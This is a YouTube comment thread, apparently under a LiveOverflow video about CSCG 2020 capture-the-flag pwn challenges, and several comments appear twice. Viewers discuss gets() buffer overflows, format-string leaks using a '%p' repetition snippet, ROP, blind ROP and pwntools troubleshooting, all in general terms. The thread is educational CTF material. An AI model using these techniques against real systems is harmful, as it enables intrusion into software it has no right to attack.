This "Mindmapping" kind of video is amazing. It clearly shows how you have struggled with learning all these techniques and then trying to wrap everything up and create a formula for it. The fact that you also explain it so efficiently shows how knowledgable you are. You are a true researcher. Thank you so much for explaining all those advanced techniques against your sanity and time. And always know that you really help those who have the same passion as you go a bit further.
Please do more of these. I have no intention of participating in a CTF but seeing the thought process behind these "hacks" is extremely fascinating (especially the way you lay it out - short and sweet).
MisterL2 it’s to add spaces between the the values returned by printf, but to remove the first space. [1:] slices the string so that it removes only the first character
Your channel is really awesome. I have a question and i hope you or someone else here reads this: So i landed my first IT Job. It´s pretty basic stuff. Some helpdesk calls, a bit active directory administration, some azure administration, some networking stuff. Everything pretty first level supportish. As i said im new to your channel so i wonder on which videoseries i should start. What makes the most sense for a relative beginner?
So helpful, I didn't think I would figure out the null byte string terminator trick but I actually figured it out while you were explaining before you said it ! that means progress ^^ Good Job me and thanks LiveOverflow for the great content.
Hi have watched all your videos and thah inspired me to enter this world I have a question about other binary in the same category (CSSG2020) RopNop, here is earth.2020.cscg.de/tasks/ropnop I have to call a shell i think to do it via syscall, with is given as a gadget, but there a funtion wich erase all ret instruction. And the same function call mprotect to give write permision to the code segment, so i think thah i can write a ret instruction. But when i try to write i got syssegv fault. I was trying all the day to solve it, i am new in this world so I would be very grateful if you could answerr this question
Reminds me of a computer class I had in highschool that was teaching US about security. They used very similar gets function in their grade system, and didn't scrub inputs. Little to say, I passed the class without doing a thing of their work
One thing I don't understand, you needed to know the password to bypass the strcmp check, whereas if you didn't have access to the binary or the source, you wouldn't have known the password. Would there be another way to solve that problem?
Don't know if it works with this binary in detail, but Blind-ROP aka BROP can be a way. There is very good paper online explaining it from stanford university: www.scs.stanford.edu/~sorbo/brop
I didn't thought that had to leek so many values. I had only 8 %p's and I have calculated so long. I'm so happy that I didn't miss calculated something.
I have the problem that I always get "[*] Got EOF while reading in interactive" when executing the python script after I already redirected to WIN. It also prints "You are a slytherin" but after that it just shows the EOF message. It works fine when I just execute ./pwn1 but not when connecting to 127.0.0.1:9100. How can I fix this?
For some reason i was able to execute the WIN function without dealing with unaligned addresses, worked locally but kept crashing on the remote. Any ideas as to why?
I haven't seen the video yet but: do we have to solve this as you guys want us to? Or can we just do something you might not thaught about (not solving but ignoring the real challenge and just spawning a root shell or something like that...)
@@pablu3880 I didn't tried and I think I'm not able to spawn a root shell and also don't want to do(/solve) it that way but I wanted to know if we have to solve it like you want us to because if someone discovers a bug to do it another way thats way easier you would just fix it. I'm definitly not a pro but I (more or less) accidently destroy imortant things sometimes and this important things are usualy security related... That's why I asked (sorry if it just anoys you) Because of your question I think you would just fix it if it is dangerous to the server.
CTF is a CTF, the flag is what counts ;) However in 99% cases each challenge is running on up-to-date OS, with it's own docker inside nsjail and with sufficient hardening that it impossible to root the box or pivot to a different challenge. So unless you have a linux 0day I doubt you can do anything weird.
This "Mindmapping" kind of video is amazing. It clearly shows how you have struggled with learning all these techniques and then trying to wrap everything up and create a formula for it. The fact that you also explain it so efficiently shows how knowledgable you are. You are a true researcher. Thank you so much for explaining all those advanced techniques against your sanity and time. And always know that you really help those who have the same passion as you go a bit further.
You're a wizard Harry
Please do more of these. I have no intention of participating in a CTF but seeing the thought process behind these "hacks" is extremely fascinating (especially the way you lay it out - short and sweet).
Bro, someone have a PornHub account named LiveOverflow with some of your videos. Is that you?
9:30 Any particular reason why you favour this way of generating a string over using i.e.
"%p" * 50
In full i.e. ("|%p" * 50) [1:]
How is this comment a week old when the video just went live? That's the real question
@@column.01 This video was available to everyone who participated in the CTF
@Zaino Dre No, this wasn't through patreon. It was available for anyone who did the CTF
MisterL2 it’s to add spaces between the the values returned by printf, but to remove the first space. [1:] slices the string so that it removes only the first character
@@0xff0x09 but my solution also adds the '|' seperator?
Nice one mate , xD and the last line "suffering is a huge part" is just damn true haha
Maybe it is too early in our relationship but I love you
will watch this a bunch more when I'm working on OSCE labs. Keep up the great videos, thanks!
Your channel is really awesome.
I have a question and i hope you or someone else here reads this:
So i landed my first IT Job. It´s pretty basic stuff. Some helpdesk calls, a bit active directory administration, some azure administration, some networking stuff. Everything pretty first level supportish.
As i said im new to your channel so i wonder on which videoseries i should start. What makes the most sense for a relative beginner?
My god. And here I was thinking this would be an easy for challenge for minors.
Well, looks like this will be fun. :)
Okay. Im done xD My brain is on fire
Buffer overflow with _gets()_
Here we go again...
Zen Waichi That’s not how the real world work(I’m not sure).
@Zen Waichi I assuming it's people not using gets()
get(bufferoverflow) portion of the video removed? I can’t find it anymore.
Counter Strike Offensive Global 2020
this video never came up in my subscriptions box..
ugh youtube,
Absolutely love the mind mapping! Please keep doing this!
insanely nicely thought out tutorial / approach
That mind map is AMAZINGLY useful to a newbie like me
I can’t wait to try this out! You keep me inspired! Thank you for everything.
sudo docker makes me shiver. Please do not run docker containers elevated.
I figured out everything myself, but how to pass non-alphanumerical to the program
you can use pwntools
Hacking = knowledge+++++++
Don't gorget to replace knowledge by "PRACTICAL KNOWLEDGE".
So helpful, I didn't think I would figure out the null byte string terminator trick but I actually figured it out while you were explaining before you said it ! that means progress ^^ Good Job me and thanks LiveOverflow for the great content.
Hi have watched all your videos and thah inspired me to enter this world
I have a question about other binary in the same category (CSSG2020) RopNop, here is earth.2020.cscg.de/tasks/ropnop
I have to call a shell i think to do it via syscall, with is given as a gadget, but there a funtion wich erase all ret instruction. And the same function call mprotect to give write permision to the code segment, so i think thah i can write a ret instruction. But when i try to write i got syssegv fault. I was trying all the day to solve it, i am new in this world so I would be very grateful if you could answerr this question
Reminds me of a computer class I had in highschool that was teaching US about security.
They used very similar gets function in their grade system, and didn't scrub inputs. Little to say, I passed the class without doing a thing of their work
Like your videos very much bro! Suffering and frustration is really true HAHAHAHA!
You could have made this video in german..... or am i missing something?
yeah. you miss everybody who doesn't speak german
@@LiveOverflow Thanks
can i know what gdb interface that u using sir?
That's pwndbg github.com/pwndbg/pwndbg. You could also like this one (GDB-peda) github.com/longld/peda
be sure to install pwndbg if you're doeing it without docker
One thing I don't understand, you needed to know the password to bypass the strcmp check, whereas if you didn't have access to the binary or the source, you wouldn't have known the password. Would there be another way to solve that problem?
Don't know if it works with this binary in detail, but Blind-ROP aka BROP can be a way. There is very good paper online explaining it from stanford university: www.scs.stanford.edu/~sorbo/brop
I didn't thought that had to leek so many values. I had only 8 %p's and I have calculated so long. I'm so happy that I didn't miss calculated something.
Why use docker when you could just use linux?
Love it
I have the problem that I always get "[*] Got EOF while reading in interactive" when executing the python script after I already redirected to WIN. It also prints "You are a slytherin" but after that it just shows the EOF message. It works fine when I just execute ./pwn1 but not when connecting to 127.0.0.1:9100. How can I fix this?
You mention executing pwn2 - are you sure you're using the right exploit?
@@rootabeta9015 sorry of course I meant pwn1
May I see your exploit code? A pastebin link is fine.
@@rootabeta9015 pastebin.com/wm4Rdbs3 this is the python exploit file
I have the same problem, did you manage to solve it?
Is there still any particular advantage to using python 2? pwntools is available for python 3
probably not. I'm just lazy
Thank you for another amazing video
WINgardium leviosa lol, love it !
liveoverflow, uri mboko hanty?
Are you safe out there bro...?😢
The word is Awesome... Live Overflow... Keep it up !!
For some reason i was able to execute the WIN function without dealing with unaligned addresses, worked locally but kept crashing on the remote. Any ideas as to why?
Because you don’t use the same setup as shown in the video. You use a different Linux distribution. I even say that in this or the previous video
Thank you. Do you also know why [*] Got EOF while in interactive appears? I've stripped my strings n such
Will this code still be exploitable if the stack canary was enabled?
Stack canary is enabled here in the next level
Amazing video
I haven't seen the video yet but:
do we have to solve this as you guys want us to?
Or can we just do something you might not thaught about (not solving but ignoring the real challenge and just spawning a root shell or something like that...)
Well can you spawn a root shell on the server where the actual flag is stored?
@@pablu3880 I didn't tried and I think I'm not able to spawn a root shell and also don't want to do(/solve) it that way but I wanted to know if we have to solve it like you want us to because if someone discovers a bug to do it another way thats way easier you would just fix it.
I'm definitly not a pro but I (more or less) accidently destroy imortant things sometimes and this important things are usualy security related...
That's why I asked (sorry if it just anoys you)
Because of your question I think you would just fix it if it is dangerous to the server.
No I really dont know If you can thats why I asked i dont have any clue :)
CTF is a CTF, the flag is what counts ;) However in 99% cases each challenge is running on up-to-date OS, with it's own docker inside nsjail and with sufficient hardening that it impossible to root the box or pivot to a different challenge. So unless you have a linux 0day I doubt you can do anything weird.
64th
Great video!
Suffering 🤨
What does pwn means?
Owned or hacked
Awesome project :)
Can someone please tell me which IDE he is using in the video?
Visual Studio Code
Thank you
Imagine using python2 in 2020, kind of cringe
Hey man how is your locality affected by covid-19
Kannst du auch Videos auf Deutsch machen? :D Dein Akzent hört man heraus hehe
First hahahahaha